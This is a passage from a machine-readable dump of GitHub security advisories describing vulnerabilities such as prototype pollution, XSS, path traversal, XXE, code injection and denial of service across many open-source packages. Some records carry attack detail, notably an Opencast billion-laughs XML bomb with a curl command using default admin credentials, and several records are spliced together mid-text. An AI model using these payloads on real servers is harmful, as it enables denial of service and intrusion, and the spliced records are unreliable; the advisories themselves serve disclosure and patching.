'https://github.com/nvuillam/npm-groovy-lint'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-20T16:57:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-6g8v-hpgw-h2v7,2023-09-12T20:56:09Z,2021-01-20T21:21:50Z,,['CVE-2020-28478'],Prototype pollution in gsap,There is a prototype pollution vulnerability in gsap which affects all versions before 3.6.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gsap'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28478'}, {'type': 'WEB', 'url': 'https://github.com/greensock/GSAP/blob/master/src/gsap-core.js#L150'}, {'type': 'WEB', 'url': 'https://github.com/greensock/GSAP/blob/master/src/gsap-core.js%23L147'}, {'type': 'WEB', 'url': 'https://github.com/greensock/GSAP/releases/tag/3.6.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GSAP-1054614'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/gsap/v/3.6.0'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-01-20T05:34:02Z', 'nvd_published_at': '2021-01-19T11:15:00Z'}" +1.4.0,GHSA-h3gg-7wx2-cq3h,2021-01-26T20:41:58Z,2021-01-29T18:13:41Z,,['CVE-2021-21283'],XSS in Flarum Sticky extension,"### Impact +A change in release beta 14 of the Sticky extension caused the plain text content of the first post of a pinned discussion to be injected as HTML on the discussion list. The issue was discovered following an internal audit. + +Any HTML would be injected through Mithril's `m.trust()` helper. This resulted in an HTML injection where ` resulted in an alert box appearing on the forum. This attack could also be modified to perform AJAX requests on behalf of a user, possibly deleting discussions, modifying their settings or profile, or even modifying settings on the Admin panel if the attack was targetted towards a privileged user. + +### Impact + +All Flarum communities that run flarum v1.0.0 or v1.0.1 are impacted. + +### Patches + +The vulnerability has been fixed and published as flarum/core v1.0.2. All communities running Flarum v1.0 have to upgrade as soon as possible to v1.0.2 using: + +``` +composer update --prefer-dist --no-dev -a -W +``` + +You can then confirm you run the latest version using: + +``` +composer show flarum/core +``` + +### Workarounds + +__None.__ + +### For more information + +For any questions or comments on this vulnerability please visit https://discuss.flarum.org/d/27558. + +For support questions create a discussion at https://discuss.flarum.org/t/support. + +A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing security@flarum.org, and we will address it promptly. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'flarum/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/flarum/core/security/advisories/GHSA-5qjq-69w6-fg57'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32671'}, {'type': 'WEB', 'url': 'https://github.com/flarum/core/commit/440bed81b8019dff00642c8f493b4909d505a28a'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/flarum/core'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-07T21:05:48Z', 'nvd_published_at': '2021-06-07T22:15:00Z'}" +1.4.0,GHSA-fj67-w3m4-rfmp,2021-05-27T22:17:45Z,2021-06-08T23:19:28Z,,['CVE-2021-33513'],Cross-site scripting in Plone,Plone through 5.2.4 allows XSS via the inline_diff methods in Products.CMFDiffTool.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33513'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/xss-vulnerability-in-cmfdifftool'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:17:45Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-jm5c-rv3w-w83m,2021-05-21T21:50:44Z,2021-06-29T21:13:20Z,,['CVE-2020-26242'],Denial of service in geth,"### Impact +Denial-of-service (crash) during block processing + +### Details + +Affected versions suffer from a vulnerability which can be exploited through the `MULMOD` operation, by specifying a modulo of `0`: `mulmod(a,b,0)`, causing a `panic` in the underlying library. +The crash was in the `uint256` library, where a buffer [underflowed](https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L442). + + if `d == 0`, `dLen` remains `0` + +and https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L451 will try to access index `[-1]`. + +The `uint256` library was first merged in this [commit](https://github.com/ethereum/go-ethereum/commit/cf6674539c589f80031f3371a71c6a80addbe454), on 2020-06-08. +Exploiting this vulnerabilty would cause all vulnerable nodes to drop off the network. + +The issue was brought to our attention through a [bug report](https://github.com/ethereum/go-ethereum/issues/21367), showing a `panic` occurring on sync from genesis on the Ropsten network. + +It was estimated that the least obvious way to fix this would be to merge the fix into `uint256`, make a new release of that library and then update the geth-dependency. + +- https://github.com/holiman/uint256/releases/tag/v1.1.1 was made the same day, +- PR to address the issue: https://github.com/holiman/uint256/pull/80 +- PR to update geth deps: https://github.com/ethereum/go-ethereum/pull/21368 + + +### Patches +Upgrade to v1.9.18 or higher + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.16'}, {'fixed': '1.9.18'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/holiman/uint256'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-jm5c-rv3w-w83m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26242'}, {'type': 'WEB', 'url': 'https://github.com/holiman/uint256/pull/80'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/7163a6664ee664df81b9028ab3ba13b9d65a7196'}, {'type': 'WEB', 'url': 'https://github.com/holiman/uint256/commit/6785da6e3eea403260a5760029e722aa4ff1716d'}, {'type': 'WEB', 'url': 'https://blog.ethereum.org/2020/11/12/geth_security_release/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0103'}]","{'cwe_ids': ['CWE-125', 'CWE-191', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:50:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-jfvf-rfmq-qwf8,2021-05-25T20:19:02Z,2021-06-22T15:23:21Z,,['CVE-2019-20789'],Croos-site scripting in Croogo,Croogo before 3.0.7 allows XSS via the title to admin/menus/menus or admin/taxonomy/vocabularies.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'croogo/croogo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20789'}, {'type': 'WEB', 'url': 'https://github.com/croogo/croogo/issues/940'}, {'type': 'WEB', 'url': 'https://github.com/croogo/croogo/compare/3.0.6...3.0.7'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:19:02Z', 'nvd_published_at': '2020-04-26T17:15:00Z'}" +1.4.0,GHSA-35qp-xq9f-2rjx,2021-05-12T21:38:07Z,2021-06-24T20:28:28Z,,['CVE-2021-3283'],Improper Privilege Management in HashiCorp Nomad,"HashiCorp Nomad and Nomad Enterprise up to 0.12.9 exec and java task drivers can access processes associated with other tasks on the same node. Fixed in 0.12.10, and 1.0.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3283'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-01-nomad-s-exec-and-java-task-drivers-did-not-isolate-processes/20332'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:38:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-mj63-64x7-57xf,2023-08-07T11:19:15Z,2021-06-18T18:43:14Z,,['CVE-2021-31800'],Path traversal in impacket,Multiple path traversal vulnerabilities exist in smbserver.py in Impacket before 0.9.23. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'impacket'}, 'ecosystem_specific': {'affected_functions': ['impacket.smbserver.findFirst2', 'impacket.smbserver.queryPathInformation', 'impacket.smbserver.SMBCommands.smbComNtCreateAndX']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.23'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31800'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/commit/49c643bf66620646884ed141c94e5fdd85bcdd2f'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/commit/99bd29e3995c254e2d6f6c2e3454e4271665955a'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py#L2008'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py#L2958'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py#L3485'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py#L876'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/releases'}, {'type': 'WEB', 'url': 'https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_23'}, {'type': 'PACKAGE', 'url': 'https://github.com/fortra/impacket'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPXDPWCAPVX3UWYZ3N2T5OLBSBBUHJP6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KRV2C5DATXBHG6TF6CEEX54KZ75THQS3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UF56LYB27LHEIFJTFHU3M75NMNNK2SCG/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:42:46Z', 'nvd_published_at': '2021-05-05T11:15:00Z'}" +1.4.0,GHSA-wrqf-rrrw-w3mg,2021-04-05T21:52:53Z,2021-06-16T17:40:47Z,,['CVE-2021-25646'],Code injection in Apache Druid,"Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.20.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25646'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04fa1ba93599487c95a8497044d37f8c02a439bfcf92b4567bfb7c8f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r121abe8014d381943b63c60615149d40bde9dc1c868bcee90d0d0848@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r443e2916c612fbd119839c0fc0729327d6031913a75081adac5b43ad@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4f84b542417ea46202867c0a8b3eaf3b4cfed30e09174a52122ba210@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5ef625076982aee7d23c23f07717e626b73f421fba5154d1e4de15e1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dff4790e7a5c697fc0360adf11f5aeb31cd6ad80644fffee690673c@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r87aa94e28dd21ee2252d30c63f01ab9cb5474ee5bdd98dd8d7d734aa@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra4225912f501016bc5e0ac44e14b8d6779173a3a1dc7baacaabcc9ba@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc167d5e57f3120578718a7a458ce3e73b3830ac4efbb1b085bd06b92@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rea9436a4063927a567d698431ddae55e760c3f876c22ac5b9813685f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfeb775822cd3baef1595b60f6860f5ca849eb1903236483f3297bd5c@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162345/Apache-Druid-0.20.0-Remote-Command-Execution.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/01/29/6'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T21:52:53Z', 'nvd_published_at': '2021-01-29T20:15:00Z'}" +1.4.0,GHSA-24wf-7vf2-pv59,2021-06-25T13:06:33Z,2021-06-28T16:38:29Z,,['CVE-2021-29620'],XXE vulnerability on Launch import with externally-defined DTD file,"### Impact +Starting from version 3.1.0 we introduced a new feature of JUnit XML launch import. Unfortunately XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file which imports external Document Type Definition (DTD) file with external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. + +### Patches +Fixed with: https://github.com/reportportal/service-api/pull/1392 + +### Binaries +`docker pull reportportal/service-api:5.4.0` +https://github.com/reportportal/service-api/packages/846871?version=5.4.0 + +### For more information +If you have any questions or comments about this advisory email us: [support@reportportal.io](mailto:support@reportportal.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.epam.reportportal:service-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '5.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/reportportal/reportportal/security/advisories/GHSA-24wf-7vf2-pv59'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29620'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/pull/1392'}, {'type': 'WEB', 'url': 'https://github.com/reportportal/service-api/commit/a73e0dfb4eda844c37139df1f9847013d55f084e'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/com.epam.reportportal/service-api'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T13:06:33Z', 'nvd_published_at': '2021-06-23T18:15:00Z'}" +1.4.0,GHSA-rcp4-jm2v-mr3f,2021-05-28T18:38:54Z,2021-06-08T23:10:24Z,,['CVE-2021-33561'],Cross-site scripting in Shopizer,"A stored cross-site scripting (XSS) vulnerability in Shopizer before 2.17.0 allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration. It is saved in the database. The code is executed for any user of store administration when information is fetched from the backend, e.g., in admin/customers/list.html.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.shopizer:shopizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33561'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/commit/197f8c78c8f673b957e41ca2c823afc654c19271'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/compare/2.16.0...2.17.0'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/49901'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:38:54Z', 'nvd_published_at': '2021-05-24T23:15:00Z'}" +1.4.0,GHSA-gc9g-67cq-p7v4,2021-05-27T21:47:01Z,2021-06-15T16:12:04Z,,['CVE-2021-33511'],Server-Side Request Forgery in Plone,"Plone though 5.2.4 allows SSRF via the lxml parser. This affects Diazo themes, Dexterity TTW schemas, and modeleditors in plone.app.theming, plone.app.dexterity, and plone.supermodel.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33511'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/server-side-request-forgery-via-lxml-parser'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:47:01Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-9gwx-9cwp-5c2m,2021-10-21T13:40:37Z,2021-06-17T20:11:35Z,,['CVE-2021-32623'],Billion laughs attack (XML bomb),"### Impact + +Opencast is vulnerable to the [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request. + +Consider an XML file (`createMediaPackage.xml`) like this: + +```xml + + + + + + + + +]> + + &lol5; + + + + + +``` + +Throwing this at Opencast will cause Opencast to parse the XML and expand the Lorem Ipsum about 100 000 times, instantly consuming a huge amount of memory: + +```sh +curl -i -u admin:opencast https://develop.opencast.org/ingestdownload/ingestdownload \ + -F 'mediapackage==1.0.1.18, fixed in 2.4.0, is affected by a regular expression denial of service vulnerability. If an attacker provides a malicious string, it can make markdown2 processing difficult or delayed for an extended period of time.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'markdown2'}, 'ecosystem_specific': {'affected_functions': ['markdown2.Markdown.convert']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.1.18'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26813'}, {'type': 'WEB', 'url': 'https://github.com/trentm/python-markdown2/pull/387'}, {'type': 'PACKAGE', 'url': 'https://github.com/trentm/python-markdown2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BRP5RN35JZTSJ3JT4722F447ZDK7LZS5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J752422YELXLMLZJPVJVKD2KKHHQRVEH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JTIX5UXRDJZJ57DO4V33ZNJTNKWGBQLY/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:02:47Z', 'nvd_published_at': '2021-03-03T16:15:00Z'}" +1.4.0,GHSA-ggjr-2f7v-vhq4,2022-08-11T16:53:09Z,2021-06-01T21:57:08Z,,['CVE-2021-20278'],Kiali Authentication Bypass vulnerability,"An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy `OpenID` is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID `implicit flow` is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.31.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20278'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1937171'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-002/'}]","{'cwe_ids': ['CWE-287', 'CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T17:44:07Z', 'nvd_published_at': '2021-05-28T11:15:00Z'}" +1.4.0,GHSA-h6qv-f5gf-8gcf,2022-12-15T18:21:22Z,2021-06-16T17:29:35Z,,['CVE-2021-21654'],Missing Authorization in Jenkins P4 plugin,"Jenkins P4 Plugin 1.11.4 and earlier does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password. + +P4 Plugin 1.11.5 requires Overall/Administer for the affected HTTP endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:p4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.11.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21654'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/p4-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2327'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T18:33:13Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-7p7h-4mm5-852v,2023-09-08T19:23:55Z,2021-06-07T22:10:39Z,,['CVE-2021-33623'],Uncontrolled Resource Consumption in trim-newlines,@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the `.end()` method.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'trim-newlines'}, 'ecosystem_specific': {'affected_functions': ['trim-newlines.trimNewlines.end']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'trim-newlines'}, 'ecosystem_specific': {'affected_functions': ['trim-newlines.trimNewlines.end']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33623'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/commit/25246c6ce5eea1c82d448998733a6302a4350d91'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/commit/b10d5f4afef832b16bc56d49fc52c68cbd403869'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/trim-newlines'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/releases/tag/v4.0.1'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00033.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210702-0007/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/trim-newlines'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:22:04Z', 'nvd_published_at': '2021-05-28T18:15:00Z'}" +1.4.0,GHSA-wq3r-jwrq-xg6w,2021-06-24T18:04:47Z,2021-06-28T16:57:23Z,,[],Canceling of orders not related to the logged-in user,"### Impact +Canceling of orders not related to the logged-in user + +### Patches +We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-wq3r-jwrq-xg6w'}, {'type': 'WEB', 'url': 'https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/download/#shopware-6'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T18:04:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-cf55-rq8x-hm6f,2021-05-28T18:00:48Z,2021-06-29T21:25:33Z,,['CVE-2021-33497'],Path Traversal in Dutchcoders transfer.sh,Dutchcoders transfer.sh before 1.2.4 allows Directory 